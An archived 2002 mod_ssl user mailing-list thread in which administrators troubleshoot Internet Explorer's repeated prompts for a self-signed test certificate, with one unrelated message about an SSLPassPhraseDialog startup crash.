X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3CC7CB69.2743.8D45997@localhost>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Aryeh,

I actually see the cert in the folder, but for some reason,
it still prompts my users to accept it.

Things that make you go hmm.....

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal,
           winning is guaranteed."


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
Sent: Thursday, April 25, 2002 9:25 AM
To: modssl-users@modssl.org
Subject: Re: Dummy SSL Certs and W32/Internet Explorer


> All,
>
> I have just installed mod_ssl-2.8.7 with Apache 1.3.23
> on my SuSE system.  Everything built ok, but the problem
> that I am having is when I am using 'dummy' or fake certificates.
>
> My Netscape/Mozilla users can easily accept and save the dummy
> certificates (the first time to the site) and then on each visit to
> the SSL-enabled site, it doesn't prompt them to accept the cert since
> it is saved.
>
> However, (there's always one), Internet Explorer accepts the
> certificate and you can even 'import' it into your program, (It even
> shows in the list), but if you close the browser and then go back to
> the SSL-enabled site, it asks you to save the cert once again, just
> like it did the first time.
>
> Is this a browser bug, an unset-setting, or just MS thinking for us
> again?
Try rebooting. You should see the certificate in the correct store once you
do.
Aryeh
---
Aryeh Katz
VASCO
www.vasco.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 15:57:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18370; Thu, 25 Apr 2002 15:56:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vasco-exch.vasco.com id PAA18354; Thu, 25 Apr 2002 15:55:55 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by vasco-exch.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 25 Apr 2002 15:53:04 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 25 Apr 2002 13:55:54 UT
Date: Thu, 25 Apr 2002 09:58:21 -0400
MIME-Version: 1.0
Subject: RE: Dummy SSL Certs and W32/Internet Explorer
Message-ID: <3CC7D33D.12946.8F2ED73@localhost>
In-reply-to: <001101c1ec5f$adeddde0$13013c0a@dcomo>
References: <3CC7CB69.2743.8D45997@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 25 Apr 2002 13:53:04.0864 (UTC) FILETIME=[85C8F600:01C1EC60]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Aryeh,
> 
> I actually see the cert in the folder, but for some reason,
> it still prompts my users to accept it.
> 
Is the CA's certificate in the browser?

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 16:53:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA22141; Thu, 25 Apr 2002 16:52:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id QAA22046; Thu, 25 Apr 2002 16:51:11 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g3PEp9M24327
	for modssl-users@modssl.org; Thu, 25 Apr 2002 10:51:09 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g3PEp8f24277
	for ; Thu, 25 Apr 2002 10:51:08 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 10:53:17 -0400
Message-ID: <001201c1ec68$efc12110$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3CC7D33D.12946.8F2ED73@localhost>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Aryeh,

It shows up in the 'Intermediate Certification Authorities'
area, but not in any others.

Is this the problem, and if so, how can I get the cert to
be accepted permanently (atleast until it expires)?

Thanks :-)

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed." 


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
Sent: Thursday, April 25, 2002 9:58 AM
To: modssl-users@modssl.org
Subject: RE: Dummy SSL Certs and W32/Internet Explorer


> Aryeh,
> 
> I actually see the cert in the folder, but for some reason,
> it still prompts my users to accept it.
> 
Is the CA's certificate in the browser?

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 17:07:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA23304; Thu, 25 Apr 2002 17:06:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vasco-exch.vasco.com id RAA22956; Thu, 25 Apr 2002 17:05:06 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by vasco-exch.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 25 Apr 2002 17:02:15 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 25 Apr 2002 15:05:05 UT
Date: Thu, 25 Apr 2002 11:07:32 -0400
MIME-Version: 1.0
Subject: RE: Dummy SSL Certs and W32/Internet Explorer
Message-ID: <3CC7E374.11325.93245A8@localhost>
In-reply-to: <001201c1ec68$efc12110$13013c0a@dcomo>
References: <3CC7D33D.12946.8F2ED73@localhost>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 25 Apr 2002 15:02:15.0828 (UTC) FILETIME=[2FF3CD40:01C1EC6A]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> Aryeh,
> 
> It shows up in the 'Intermediate Certification Authorities'
> area, but not in any others.
> 
> Is this the problem, and if so, how can I get the cert to
> be accepted permanently (atleast until it expires)?
> 
Install Certificate Wizard->Next->
Place all Certificates into the following store->Browse->
Show Physical Stores->Trusted Root CAs->Registry->
OK
etc.
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 18:27:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA29267; Thu, 25 Apr 2002 18:26:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id SAA29217; Thu, 25 Apr 2002 18:25:26 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g3PGPOo32086
	for modssl-users@modssl.org; Thu, 25 Apr 2002 12:25:24 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g3PGPMf32036
	for ; Thu, 25 Apr 2002 12:25:23 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 12:27:31 -0400
Message-ID: <001901c1ec76$1a0fbe60$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3CC7E374.11325.93245A8@localhost>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Aryeh,

I did everything that you had mentioned, but it is
still coming up with the message even after I install
them.  (I haven't rebooted my machine yet, so I don't
know if that has anything to do with it.)

I'll reply back to the list after I reboot and let you
know if that did it.

Thanks :-)

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed." 


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
Sent: Thursday, April 25, 2002 11:08 AM
To: modssl-users@modssl.org
Subject: RE: Dummy SSL Certs and W32/Internet Explorer


> Aryeh,
> 
> It shows up in the 'Intermediate Certification Authorities'
> area, but not in any others.
> 
> Is this the problem, and if so, how can I get the cert to
> be accepted permanently (atleast until it expires)?
> 
Install Certificate Wizard->Next->
Place all Certificates into the following store->Browse->
Show Physical Stores->Trusted Root CAs->Registry->
OK
etc.
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 18:36:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA29591; Thu, 25 Apr 2002 18:35:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id SAA29568; Thu, 25 Apr 2002 18:34:19 +0200 (MET DST)
Received: (qmail 12074 invoked from network); 25 Apr 2002 16:34:16 -0000
Received: from unknown (HELO bio2) ([64.24.216.52]) (envelope-sender )
          by mail12.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 25 Apr 2002 16:34:16 -0000
Message-ID: <005901c1ec77$79741a80$34d81840@bio2>
From: "Frank Reichenbacher" 
To: 
References: <001901c1ec76$1a0fbe60$13013c0a@dcomo>
Subject: Re: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 09:37:19 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frank Reichenbacher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Drew -

Did you sign the certificate? I forgot to mention that I was unable to get
my IE 6 to accept the CA without prompting until I signed my certificate.

Frank



----- Original Message -----
From: "Drew J. Como" 
To: 
Sent: Thursday, April 25, 2002 9:27 AM
Subject: RE: Dummy SSL Certs and W32/Internet Explorer


> Aryeh,
>
> I did everything that you had mentioned, but it is
> still coming up with the message even after I install
> them.  (I haven't rebooted my machine yet, so I don't
> know if that has anything to do with it.)
>
> I'll reply back to the list after I reboot and let you
> know if that did it.
>
> Thanks :-)
>
> ============================================
> Drew J. Como             Phone: 631-434-6600
> Systems Administrator      Fax: 631-434-7800
> dcomo@bascom.com         Web: www.bascom.com
>     Bascom Global Internet Services, Inc.
> --------------------------------------------
>           "When quality is the goal,
>            winning is guaranteed."
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
> Sent: Thursday, April 25, 2002 11:08 AM
> To: modssl-users@modssl.org
> Subject: RE: Dummy SSL Certs and W32/Internet Explorer
>
>
> > Aryeh,
> >
> > It shows up in the 'Intermediate Certification Authorities'
> > area, but not in any others.
> >
> > Is this the problem, and if so, how can I get the cert to
> > be accepted permanently (atleast until it expires)?
> >
> Install Certificate Wizard->Next->
> Place all Certificates into the following store->Browse->
> Show Physical Stores->Trusted Root CAs->Registry->
> OK
> etc.
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 18:57:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00551; Thu, 25 Apr 2002 18:56:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from gmk-smtp4.growmark.com id SAA00494; Thu, 25 Apr 2002 18:55:41 +0200 (MET DST)
Received: FROM exchange-gmk.growmark2.com BY gmk-smtp4.growmark.com ; Thu Apr 25 11:55:34 2002 -0500
Received: by webmail.growmark2.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 25 Apr 2002 11:55:34 -0500
Message-ID: 
From: "Price, Gary" 
To: "'modssl-users@modssl.org'" 
Subject: SSLPassPhraseDialog
Date: Thu, 25 Apr 2002 11:55:33 -0500
X-Mailer: Internet Mail Service (5.5.2653.19)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Price, Gary" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When I use the exec option with SSLPassPhraseDialog Apache core dumps at
startup. The only entry in the log files is

[25/Apr/2002 11:27:11 22048] [info]  Init: Requesting pass phrase from
dialog filter program (/opt/apache/bin/pass_web.sh
 
This only occurs with the versions below.
Server Version: Apache/1.3.19 (Unix) mod_ssl/2.8.3 OpenSSL/0.9.5a
When I run the same script with these versions I have no problem.
Server Version: Apache/1.3.12 (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a
When I switch back to builtin and enter the password manually Apache starts
without error.
Here is a copy of the script that's being executed
#!/bin/ksh
echo mypassword

Any help would be appreciated.

Thanks,
Gary

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 19:41:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA03123; Thu, 25 Apr 2002 19:40:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id TAA03069; Thu, 25 Apr 2002 19:39:09 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g3PHd7A04283
	for modssl-users@modssl.org; Thu, 25 Apr 2002 13:39:07 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g3PHd6f04233
	for ; Thu, 25 Apr 2002 13:39:07 -0400
From: "Drew J. Como" 
To: 
Subject: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 13:41:15 -0400
Message-ID: <000301c1ec80$668adc70$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Frank,

That may be it..  Let me be stupid for a second.  How
do I 'sign' the cert?

Thanks :-)

Drew


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Frank Reichenbacher
Sent: Thursday, April 25, 2002 12:37 PM
To: modssl-users@modssl.org
Subject: Re: Dummy SSL Certs and W32/Internet Explorer


Drew -

Did you sign the certificate? I forgot to mention that I was unable to get
my IE 6 to accept the CA without prompting until I signed my certificate.

Frank



----- Original Message -----
From: "Drew J. Como" 
To: 
Sent: Thursday, April 25, 2002 9:27 AM
Subject: RE: Dummy SSL Certs and W32/Internet Explorer


> Aryeh,
>
> I did everything that you had mentioned, but it is
> still coming up with the message even after I install
> them.  (I haven't rebooted my machine yet, so I don't
> know if that has anything to do with it.)
>
> I'll reply back to the list after I reboot and let you
> know if that did it.
>
> Thanks :-)
>
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
> Sent: Thursday, April 25, 2002 11:08 AM
> To: modssl-users@modssl.org
> Subject: RE: Dummy SSL Certs and W32/Internet Explorer
>
>
> > Aryeh,
> >
> > It shows up in the 'Intermediate Certification Authorities'
> > area, but not in any others.
> >
> > Is this the problem, and if so, how can I get the cert to
> > be accepted permanently (atleast until it expires)?
> >
> Install Certificate Wizard->Next->
> Place all Certificates into the following store->Browse->
> Show Physical Stores->Trusted Root CAs->Registry->
> OK
> etc.
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 20:17:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA05404; Thu, 25 Apr 2002 20:16:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id UAA05272; Thu, 25 Apr 2002 20:15:43 +0200 (MET DST)
Received: (qmail 6378 invoked from network); 25 Apr 2002 18:15:39 -0000
Received: from unknown (HELO bio2) ([64.24.216.52]) (envelope-sender )
          by mail12.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 25 Apr 2002 18:15:39 -0000
Message-ID: <009101c1ec85$9e75a480$34d81840@bio2>
From: "Frank Reichenbacher" 
To: 
References: <000301c1ec80$668adc70$13013c0a@dcomo>
Subject: Re: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 11:18:35 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frank Reichenbacher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Bring it up in pico, then write your signature on the monitor with a
Vis-A-Vis.

Actually there is a script included in the mod_ssl tarball, called,
interestingly enough, "sign.sh", that does it for you. Again, I forget the
details (sorry).

But no! I just found it in the archives from only two months ago:

http://www.mail-archive.com/modssl-users@modssl.org/msg13272.html

Frank

P.S. - If this doesn't work try using a permanent ink pen.


----- Original Message -----
From: "Drew J. Como" 
To: 
Sent: Thursday, April 25, 2002 10:41 AM
Subject: Dummy SSL Certs and W32/Internet Explorer


> Frank,
>
> That may be it..  Let me be stupid for a second.  How
> do I 'sign' the cert?
>
> Thanks :-)
>
> Drew
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Frank Reichenbacher
> Sent: Thursday, April 25, 2002 12:37 PM
> To: modssl-users@modssl.org
> Subject: Re: Dummy SSL Certs and W32/Internet Explorer
>
>
> Drew -
>
> Did you sign the certificate? I forgot to mention that I was unable to get
> my IE 6 to accept the CA without prompting until I signed my certificate.
>
> Frank
>
>
>
> ----- Original Message -----
> From: "Drew J. Como" 
> To: 
> Sent: Thursday, April 25, 2002 9:27 AM
> Subject: RE: Dummy SSL Certs and W32/Internet Explorer
>
>
> > Aryeh,
> >
> > I did everything that you had mentioned, but it is
> > still coming up with the message even after I install
> > them.  (I haven't rebooted my machine yet, so I don't
> > know if that has anything to do with it.)
> >
> > I'll reply back to the list after I reboot and let you
> > know if that did it.
> >
> > Thanks :-)
> >
> >
> >
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
> > Sent: Thursday, April 25, 2002 11:08 AM
> > To: modssl-users@modssl.org
> > Subject: RE: Dummy SSL Certs and W32/Internet Explorer
> >
> >
> > > Aryeh,
> > >
> > > It shows up in the 'Intermediate Certification Authorities'
> > > area, but not in any others.
> > >
> > > Is this the problem, and if so, how can I get the cert to
> > > be accepted permanently (atleast until it expires)?
> > >
> > Install Certificate Wizard->Next->
> > Place all Certificates into the following store->Browse->
> > Show Physical Stores->Trusted Root CAs->Registry->
> > OK
> > etc.
> > ---
> > Aryeh Katz
> > VASCO
> > www.vasco.com
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 20:23:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA05673; Thu, 25 Apr 2002 20:19:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA05522; Thu, 25 Apr 2002 20:17:56 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8900C4CE75F; Thu, 25 Apr 2002 20:17:49 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3PIDcT93258; Thu, 25 Apr 2002 20:13:38 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id RAA23480; Thu, 25 Apr 2002 17:08:16 +0200 (MET DST)
Received: (qmail 21704 invoked from network); 25 Apr 2002 15:08:09 -0000
Received: from unknown (HELO bio2) ([64.24.216.52]) (envelope-sender )
          by mail12.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 25 Apr 2002 15:08:09 -0000
Message-ID: <002b01c1ec6b$74f42e20$34d81840@bio2>
From: "Frank Reichenbacher" 
To: 
References: <001201c1ec68$efc12110$13013c0a@dcomo>
Subject: Re: Dummy SSL Certs and W32/Internet Explorer
Date: Thu, 25 Apr 2002 08:11:16 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frank Reichenbacher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You have to install it in the Trusted Root CA Store. Next time it comes up,
choose install and then click stuff until you find an option to install it
to the trusted root store.

You may also be able to install it using Tools|Internet Options|Content, but
I haven't tried it.

I did it the other day for my own test cert and now I don't get prompted to
approve using IE 6.026. Unfortunately, I don't recall the precise steps to
be taken and since I already installed it, I can't duplicate it without
making a new cert.

Frank


----- Original Message -----
From: "Drew J. Como" 
To: 
Sent: Thursday, April 25, 2002 7:53 AM
Subject: RE: Dummy SSL Certs and W32/Internet Explorer


> Aryeh,
>
> It shows up in the 'Intermediate Certification Authorities'
> area, but not in any others.
>
> Is this the problem, and if so, how can I get the cert to
> be accepted permanently (atleast until it expires)?
>
> Thanks :-)
>
> ============================================
> Drew J. Como             Phone: 631-434-6600
> Systems Administrator      Fax: 631-434-7800
> dcomo@bascom.com         Web: www.bascom.com
>     Bascom Global Internet Services, Inc.
> --------------------------------------------
>           "When quality is the goal,
>            winning is guaranteed."
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Aryeh Katz
> Sent: Thursday, April 25, 2002 9:58 AM
> To: modssl-users@modssl.org
> Subject: RE: Dummy SSL Certs and W32/Internet Explorer
>
>
> > Aryeh,
> >
> > I actually see the cert in the folder, but for some reason,
> > it still prompts my users to accept it.
> >
> Is the CA's certificate in the browser?
>
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 25 20:54:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA07904; Thu, 25 Apr 2002 20:53:54 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id UAA07873; Thu, 25 Apr 2002 20:53:05 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g3PIr3M09210
